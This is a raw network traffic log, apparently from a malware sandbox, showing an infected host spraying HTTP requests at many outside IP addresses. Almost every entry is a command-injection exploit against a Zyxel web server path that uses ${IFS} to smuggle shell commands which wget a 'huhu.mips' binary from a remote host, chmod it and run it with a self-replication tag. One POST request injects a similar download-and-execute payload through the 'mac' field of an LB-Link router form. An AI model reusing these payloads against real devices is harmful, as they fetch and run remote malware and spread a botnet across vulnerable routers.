                                              Jan 29, 2024 07:03:35.730552912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              964192.168.2.144221658.35.209.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730597019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              965192.168.2.1457548203.18.117.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730616093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              966192.168.2.143807457.198.153.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730669022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              967192.168.2.1441702179.96.179.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730705976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              968192.168.2.145019836.6.63.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730740070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              969192.168.2.1434670222.128.85.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730793953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              970192.168.2.145819475.157.247.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.730834961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              971192.168.2.145740235.71.134.728080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.562082052 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              972192.168.2.145528246.72.126.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742362976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              973192.168.2.144191813.196.211.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742408991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              974192.168.2.1450460181.174.92.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742455959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              975192.168.2.1438356109.169.201.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742487907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              976192.168.2.1437682182.74.171.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742552042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              977192.168.2.1458212218.13.101.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742573023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              978192.168.2.1434578209.146.113.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742629051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              979192.168.2.143493031.36.240.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742666006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              980192.168.2.1447710130.64.209.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742692947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              981192.168.2.1445804173.142.136.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742758989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              982192.168.2.144127044.62.64.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742800951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              983192.168.2.1447540111.136.194.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742831945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              984192.168.2.144442874.135.2.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742873907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              985192.168.2.143566265.66.155.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742898941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              986192.168.2.144055431.157.238.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742933989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              987192.168.2.1436442131.179.252.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.742993116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              988192.168.2.145583231.113.3.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743027925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              989192.168.2.1446354122.235.46.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743067026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              990192.168.2.1446562216.131.172.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743094921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              991192.168.2.1446432147.192.121.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743139029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              992192.168.2.1435558182.96.58.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743206978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              993192.168.2.1442006128.147.115.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743238926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              994192.168.2.1459008171.173.145.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743263006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              995192.168.2.1450380123.3.95.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743319988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              996192.168.2.1460026152.86.232.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743331909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              997192.168.2.1456784201.114.238.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743376017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              998192.168.2.145678885.101.108.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743426085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              999192.168.2.14564604.5.209.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743457079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1000192.168.2.1459562218.221.18.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743482113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1001192.168.2.145457099.124.189.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743518114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1002192.168.2.145398858.139.145.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743568897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1003192.168.2.1443786200.136.99.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743606091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1004192.168.2.1447052139.32.120.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743660927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1005192.168.2.1456584106.121.245.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743689060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1006192.168.2.143280265.175.155.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743724108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1007192.168.2.145848464.92.36.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743772030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1008192.168.2.1446454186.87.99.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743804932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1009192.168.2.1437246109.239.205.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743848085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1010192.168.2.1455844111.4.136.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743866920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1011192.168.2.143392467.6.17.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743906021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1012192.168.2.1456644212.160.48.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743931055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1013192.168.2.1458472158.186.129.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.743977070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1014192.168.2.145939213.35.76.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744024992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1015192.168.2.144239298.10.57.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744057894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1016192.168.2.1453492110.121.204.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744107962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1017192.168.2.1460164193.222.212.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744155884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1018192.168.2.1446010125.130.96.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744205952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1019192.168.2.1441622121.51.181.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744240999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1020192.168.2.1440164201.30.109.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744281054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1021192.168.2.14438808.241.49.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744318008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1022192.168.2.1444530217.209.106.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744368076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1023192.168.2.1450090107.40.121.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744410992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1024192.168.2.14589021.198.244.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.744451046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1025192.168.2.1450664200.48.18.10443
                                              TimestampBytes transferredDirectionData
